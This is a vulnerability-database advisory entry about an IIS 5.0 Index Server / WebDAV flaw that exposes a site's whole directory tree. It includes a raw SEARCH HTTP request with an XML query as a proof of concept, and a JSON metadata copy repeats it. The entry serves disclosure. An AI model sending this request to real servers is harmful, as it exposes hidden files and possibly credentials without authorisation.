Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability
2014-07-01T00:00:00
ID SSV:74151 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/1756/info
If Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed Authoring and Versioning (WebDAV) search implementation. Hidden directories, include files (*.inc), or other documents that would not normally be accessible through the regular website interface can be exposed through this exploit.
Successful exploitation could lead to the discovery of certain files that may contain sensitive information such as usernames and passwords.
The Index Server is disabled by default in IIS 5.0 and only directories that have the 'Index' property set are affected by this vulnerability.
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133
<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
{"lastseen": "2017-11-19T16:05:14", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2017-11-19T16:05:14", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:05:14", "rev": 2}, "vulnersScore": -0.5}, "href": "https://www.seebug.org/vuldb/ssvid-74151", "references": [], "enchantments_done": [], "id": "SSV:74151", "title": "Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n source: http://www.securityfocus.com/bid/1756/info\r\n\r\nIf Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed Authoring and Versioning (WebDAV) search implementation. Hidden directories, include files (*.inc), or other documents that would not normally be accessible through the regular website interface can be exposed through this exploit.\r\n\r\nSuccessful exploitation could lead to the discovery of certain files that may contain sensitive information such as usernames and passwords.\r\n\r\nThe Index Server is disabled by default in IIS 5.0 and only directories that have the 'Index' property set are affected by this vulnerability. \r\n\r\nSEARCH / HTTP/1.1\r\nHost: target\r\nContent-Type: text/xml\r\nContent-Length: 133\r\n\r\n<?xml version="1.0"?>\r\n<g:searchrequest xmlns:g="DAV:">\r\n<g:sql>\r\nSelect "DAV:displayname" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-74151", "type": "seebug"}